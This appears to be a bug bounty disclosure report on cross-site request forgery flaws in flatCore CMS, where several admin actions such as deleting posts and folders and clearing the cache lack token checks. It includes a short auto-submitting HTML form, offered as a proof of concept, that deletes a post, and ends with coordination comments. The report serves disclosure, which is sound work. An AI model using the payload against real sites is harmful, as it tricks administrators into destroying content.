Cross-Site Request Forgery (CSRF) in flatcore/flatcore-cms
Reported on
Oct 11th 2021
Description
- Missing CSRF token in the delete posts and delete folder forms in the frontend
- Missing backend CSRF validation in 1) removing and enabling fixed status, 2) deleting posts, 3) deleting a folder, and 4) del_exclude in the indexing page (see Permalinks)
- Missing CSRF protection for delete cache (frontend and backend)
Proof of Concept
Save the following as index.html and open it in a browser:
<html>
  <body>
    <!-- Auto-submitting POST to the posts admin page; no CSRF token is required by the backend -->
    <form action="http://[FLATCORE-IP]/flatCore-CMS/acp/acp.php?tn=posts" method="POST">
      <input type="hidden" name="delete_id" value="2" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
Impact
Attackers can trick admin users into deleting posts and changing fix status.
Occurrences
dashboard.top.php L6-L15: delete cache backend
posts.list.php L11-L31: missing delete post validation backend
dashboard.top.php L290: delete_cache frontend
files.browser.php L609-L617: missing delete folder frontend
files.browser.php L191-L210: missing delete folder backend
pages.index.php L428-L438: missing delete element frontend
posts.list.php L38-L46: remove fixed backend
posts.list.php L50-L59: set fixed backend
SECURITY.md
a year ago
Hi @admin, maintainer says he will take time to post the SECURITY.md, https://github.com/flatCore/flatCore-CMS/issues/70, if possible, could you help me by posting the report links there? Thanks!
@haxatron - feel free to share the report URLs on the Github issue that has been created. You are always welcome to share these reports, as the maintainers that view them will be authorised to view.
If the maintainers prefer not to sign up, we request the SECURITY.md so that we can send a magic URL, giving them access, to their elected email address.